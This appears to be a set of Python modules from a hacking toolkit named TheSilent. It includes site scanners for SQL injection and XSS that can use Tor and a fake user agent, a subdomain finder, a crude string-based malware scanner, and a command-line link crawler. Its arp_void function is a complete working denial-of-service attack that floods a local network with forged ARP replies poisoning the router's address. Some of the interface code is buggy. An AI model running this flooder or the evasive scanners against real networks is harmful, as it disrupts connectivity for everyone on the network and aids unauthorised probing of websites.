from TheSilent.clear import clear

CYAN = "\033[1;36m"

# attempts to view source code of file
def source_code_viewer(file, keyword=""):
    clear()

    count = 0

    with open(file, "rb") as f:
        for i in f:
            result = i.decode(errors="ignore")
            if keyword in result:
                print(CYAN + result)
                count += 1

                if count == 128:
                    count = 0
                    pause = input()

    print(CYAN + "\ndone")



from TheSilent.clear import clear
from TheSilent.sql_injection_scanner import sql_injection_scanner
from TheSilent.xss_scanner import xss_scanner

CYAN = "\033[1;36m"

# scans for all security flaws


def security_scanner(url, secure=True, tor=False, my_file=" ", crawl="0", parse=" ", delay=1):
    clear()

    my_sql_injection_scanner = sql_injection_scanner(
        url=url,
        secure=secure,
        tor=tor,
        my_file=my_file,
        crawl=crawl,
        parse=parse,
        delay=delay)
    my_xss_scanner = xss_scanner(
        url=url,
        secure=secure,
        tor=tor,
        my_file=my_file,
        crawl=crawl,
        parse=parse,
        delay=delay)

    clear()

    print(CYAN + "sql injection:")

    for i in my_sql_injection_scanner:
        print(CYAN + i)

    print("")
    print(CYAN + "xss:")

    for i in my_xss_scanner:
        print(CYAN + i)



import re
import requests
from TheSilent.return_user_agent import return_user_agent

# create html sessions object
web_session = requests.Session()

# fake user agent
user_agent = {"User-Agent": return_user_agent()}

tor_proxy = {
    "https": "socks5h://localhost:9050",
    "http": "socks5h://localhost:9050"}

# increased security
requests.packages.urllib3.disable_warnings()
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ":HIGH:!DH:!aNULL"

# increased security
try:
    requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ":HIGH:!DH:!aNULL"

except AttributeError:
    pass

# scans for forms


def form_scanner(url, secure=True, tor=False, parse="forms"):
    if "https://" not in url and "http://" not in url:
        if secure:
            my_secure = "https://"

        else:
            my_secure = "http://"

        url = my_secure + url

    try:
        if tor:
            result = web_session.get(url, verify=False, headers=user_agent, proxies=tor_proxy, timeout=(60,120)).text

        else:
            result = web_session.get(url, verify=False, headers=user_agent, timeout=(5,30)).text

        try:
            if parse == "forms":
                forms = re.findall("<form[\n\\w\\S\\s]+?form>", result)
                return forms

            if parse == "input":
                input_form = re.findall("<input.+?>", result)
                return input_form

        except UnicodeDecodeError:
            return []

    except:
        return []



import re
from TheSilent.link_scanner import link_scanner
from TheSilent.clear import clear

CYAN = "\033[1;36m"

# scans for subdomains
def subdomain_scanner(url, secure=True, tor=False, crawl="all", delay=1, my_file=" "):
    domain_list = []

    website = []

    if my_file == " ":
        website = link_scanner(
            url,
            secure=secure,
            tor=tor,
            crawl=crawl,
            parse=url,
            delay=delay)

    if my_file != " ":
        with open(my_file, "r", errors="ignore") as file:
            for i in file:
                clean = i.replace("\n", "")
                website.append(clean)

    clear()

    for i in website:
        domain = re.findall("(http://|https://)(.+)\\." + url, i)

        try:
            result = domain[0][1]
            domain_list.append(result)

        except:
            continue

    domain_list = list(set(domain_list))

    return domain_list



import binascii
import ipaddress
import socket
import sys
import time
import uuid
from sys import platform
from TheSilent.clear import clear

CYAN = "\033[1;36m"
RED = "\033[1;31m"

# denial of service attack against local area network using an arp void attack


def arp_void(router):
    clear()

    mac = hex(uuid.getnode())
    og_mac = str(mac).replace("0x", "")
    mac = ":".join(mac[i:i + 2] for i in range(0, len(mac), 2))
    mac = str(mac).replace("0x:", "")

    interface = socket.if_nameindex()

    print(CYAN + "mac address: " + mac + " | ip address: " + router + " | interface: " + str(interface[1][1]))

    router = hex(int(ipaddress.IPv4Address(router)))
    router = str(router).replace("0x", "")

    while True:
        time.sleep(1)
        try:
            my_code = binascii.unhexlify(
                "ffffffffffff" +
                og_mac +
                "08060001080006040002" +
                og_mac +
                router +
                "ffffffffffff" +
                "00000000")

            if platform == "linux":
                super_socket = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(3))

            else:
                print(RED + "Unsupported platform! Linux is required for this tool!")
                sys.exit()

            super_socket.bind((interface[1][1], 0))
            super_socket.sendall(my_code)
            print("packet sent")

        except:
            continue



import codecs
from TheSilent.clear import clear

CYAN = "\033[1;36m"


def hex_viewer(file):
    clear()
    count = 0
    my_string = ""

    with open(file, "rb") as f:
        for chunk in iter(lambda: f.read(2), b""):
            try:
                hex_code = codecs.decode(chunk, "hex")
                clean = str(hex_code).replace("b", "")
                clean = clean.replace("'", "")
                clean = clean.replace("\\", "")
                clean = clean.replace("x", "")
                my_string += clean
                count += 1

                if count == 64:
                    print(CYAN + my_string)
                    count = 0
                    my_string = ""

            except:
                pass

    print(CYAN + "\ndone")



import os
from TheSilent.clear import clear

CYAN = "\033[1;36m"
RED = "\033[1;31m"


def av(my_dir):
    # av escape includes anti-debugging strings
    anti_debug_strings = ["checkremotedebugger", "isdebuggerpresent"]
    ransomware_strings = ["Encrypt", "Reg"]

    malware_list = []

    clear()

    for path, directories, files in os.walk(my_dir):
        for file in files:
            scan = path + "/" + file

            anti_debug_hits = 0
            anti_vm_hits = 0
            ransomware_hits = 0

            try:
                if os.stat(scan).st_size > 0 and os.stat(scan).st_size < 1000000000:
                    print(CYAN + "checking: " + scan)
                    with open(scan, "rb") as f:
                        # scan for anti-debug strings
                        f.seek(0)
                        detected_strings = []
                        skip = False
                        for i in f:
                            result = i.decode(errors="replace").lower()
                            for mal in anti_debug_strings:
                                for detect in detected_strings:
                                    if detect == mal:
                                        skip = True

                                if mal in result and anti_debug_hits < len(anti_debug_strings) and not skip:
                                    anti_debug_hits += 1
                                    detected_strings.append(mal)
                                    
                        # scan for ransomware strings
                        f.seek(0)
                        detected_strings = []
                        skip = False
                        for i in f:
                            result = i.decode(errors="replace")
                            for mal in ransomware_strings:
                                for detect in detected_strings:
                                    if detect == mal:
                                        skip = True
                                        
                                if mal in result and ransomware_hits < len(ransomware_strings) and not skip:
                                    ransomware_hits += 1
                                    detected_strings.append(mal)

                if anti_debug_hits > 0:
                    chance = 100 * (anti_debug_hits / len(anti_debug_strings))
                    if chance > 0:
                        print(RED + f"{chance}% anti-debug: " + scan)
                        malware_list.append(f"{chance}% anti-debug: " + scan)

                if ransomware_hits > 0:
                    chance = 100 * (ransomware_hits / len(ransomware_strings))
                    if chance == 100:
                        print(RED + f"{chance}% ransomware: " + scan)
                        malware_list.append(f"{chance}% ransomware: " + scan)

            except PermissionError:
                print(RED + "ERROR! Permission error!")
                continue

            except:
                continue

    clear()

    malware_list = list(set(malware_list))
    malware_list.sort()

    if len(malware_list) > 0:
        for malware in malware_list:
            print(RED + malware)

        print(RED + f"\n{len(malware_list)} possible threats detected!")

    else:
        print(CYAN + "No threats detected!")



import argparse
import TheSilent.TheSilent as ts

og_parser = argparse.ArgumentParser(prog="TheSilent")

# tools
og_parser.add_argument(
    "--link_scanner",
    dest="link_scanner",
    required=False,
    help="[tool]: crawl urls")

# parameters
og_parser.add_argument(
    "--crawl",
    dest="crawl",
    required=False,
    help="[parameter]: Crawl 'all' like google or crawl 'x' links. Defaults to all.")
og_parser.add_argument(
    "--delay",
    dest="delay",
    required=False,
    help="[parameter]: Delay (in seconds). Defaults to 1.")
og_parser.add_argument(
    "--my_file",
    dest="my_file",
    required=False,
    help="[parameter]: Outputs urls to text file. Example: links.txt. defaults to none.")
og_parser.add_argument(
    "--parse",
    dest="parse",
    required=False,
    help="[parameter]: Parse url for specific string. Example: .onion, .com, .org, etc. Defaults to none.")
og_parser.add_argument(
    "--secure",
    dest="secure",
    required=False,
    help="[parameter]: https:// = True, http:// = False. Defaults to True")
og_parser.add_argument(
    "--title",
    dest="title",
    required=False,
    help="[parameter]: Get the title of the website. Defaults to False.")
og_parser.add_argument(
    "--tor",
    dest="tor",
    required=False,
    help="[parameter]: Send get requests over tor. Defaults to False.")
og_parser.add_argument(
    "--url",
    dest="url",
    required=False,
    help="[parameter]: The url. Example: example.com. Defaults to none.")

args = og_parser.parse_args()

if args.link_scanner == "True":
    if args.crawl is None:
        crawl = "all"

    elif args.crawl == "all":
        crawl = "all"

    else:
        crawl = int(args.crawl)

    if args.delay is None:
        delay = 1

    elif args.delay is not None:
        depth = args.delay

    if args.my_file is None:
        my_file = " "

    else:
        my_file = str(args.my_file)

    if args.parse is None:
        parse = " "

    else:
        parse = str(args.parse)

    if args.secure is None:
        secure = True

    else:
        secure = bool(args.secure)

    if args.title is None:
        title = False

    else:
        title = bool(args.title)

    if args.tor is None:
        tor = False

    else:
        tor = bool(args.tor)

    if args.url is None:
        print("ERROR! URL required! Use --url=example.com")

    if args.url is not None:
        result = ts.link_scanner(str(args.url),
                                 secure=secure,
                                 tor=tor,
                                 my_file=my_file,
                                 crawl=crawl,
                                 parse=parse,
                                 title=title)

        ts.clear()
        for i in result:
            print(i)
